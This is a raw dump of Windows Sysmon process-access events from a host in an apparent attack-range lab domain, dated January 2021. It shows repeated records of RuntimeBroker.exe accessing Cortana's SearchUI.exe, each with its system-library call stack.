13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 